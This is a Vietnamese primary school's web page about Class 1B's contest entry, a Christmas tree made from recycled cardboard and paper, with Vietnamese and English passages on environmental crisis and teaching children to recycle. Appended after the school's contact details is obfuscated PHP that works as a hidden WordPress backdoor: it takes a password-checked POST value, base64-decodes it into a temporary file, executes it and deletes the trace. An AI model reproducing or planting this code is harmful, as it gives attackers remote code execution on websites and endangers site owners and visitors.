Làm cây thông Noel – Trang trí Noel từ vật liệu tái chế của Lớp 1B

post

BÀI THI SỐ 6: Làm cây thông Noel từ vật liệu tái chế của Lớp 1B
Kính mời các quý Phụ huynh, các thầy cô cùng like, thả tym, và chia sẻ video tuyệt vời của các con lớp 1B tự làm cây thông Noel và các đồ trang trí Noel từ bìa carton, giấy đã qua sử dụng…
Hành tinh đang chết nhanh hơn chúng ta tưởng
Nhân loại đang hướng tới một “tương lai kinh hoàng” với sự tuyệt chủng hàng loạt, khủng hoảng sức khỏe và những gián đoạn liên tục do khí hậu gây ra đối với xã hội – một điều chỉ có thể được ngăn chặn nếu các nhà lãnh đạo thế giới bắt đầu coi trọng các mối đe dọa môi trường
Có thể không có mối đe dọa nào lớn hơn, ngày càng gia tăng mà trẻ em thế giới – và con cái của họ phải đối mặt. Cuộc khủng hoảng toàn cầu đang gia tăng này có khả năng làm suy yếu nhiều thành quả mà chúng ta đã đạt được trong sự tồn tại và phát triển của trẻ em – và còn gây ra những nguy hiểm lớn hơn ở phía trước. Trong mọi cuộc khủng hoảng, trẻ em là đối tượng dễ bị tổn thương nhất.
Ngày nay việc học cách tái chế trở nên dễ dàng và thú vị hơn bao giờ hết đối với trẻ em. Có rất nhiều trò chơi và hoạt động liên quan đến tái chế được thiết kế để dạy trẻ em tạo ra ít chất thải hơn, tách chúng ra và tái sử dụng, giúp củng cố các giá trị sinh thái và cam kết của chúng đối với môi trường.
Khi học cách tái chế, trẻ em được tiếp xúc với một loạt các khả năng học tập khác.
Một ngày nào đó, con cái của chúng ta sẽ nhận được chìa khóa của hành tinh và sẽ phải chăm sóc nó. Tương lai của trái đất nằm trong tay các con, và hàng triệu loài sau đó sẽ phụ thuộc vào việc bảo vệ của các con để ngăn chặn sự tuyệt chủng gần như không thể tránh khỏi. Do đó, chúng ta phải ngăn chặn thế hệ tiếp theo mắc phải những sai lầm tương tự như chúng ta đã mắc phải và giáo dục các con để xây dựng một thế giới tốt đẹp hơn, bền vững hơn.
The planet is dying faster than we thought
Humanity is barreling toward a “ghastly future” of mass extinctions, health crises and constant climate-induced disruptions to society — one that can only be prevented if world leaders start taking environmental threats seriously
There may be no greater, growing threat facing the world’s children – and their children. This mounting global crisis has the potential to undermine many of the gains we have made in child survival and development – and poses even greater dangers ahead. In every crisis, children are the most vulnerable.
Today learning how to recycle is easier and more fun than ever for kids. There are numerous games and activities related to recycling that are designed to teach children to generate less waste, separate it and reuse it, helping to reinforce their ecological values and commitment to the environment.
In learning how to recycle, children are exposed to a host of other learning possibilities.
Someday our children will receive the keys to the planet and will have to take care of it. They will have our future in their hands, and that of millions of species that will then depend on the sensitivity of their fingers to prevent their almost inevitable extinction. We must therefore stop the next generation from making the same mistakes that we have made and educate them to build a better, more sustainable world.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}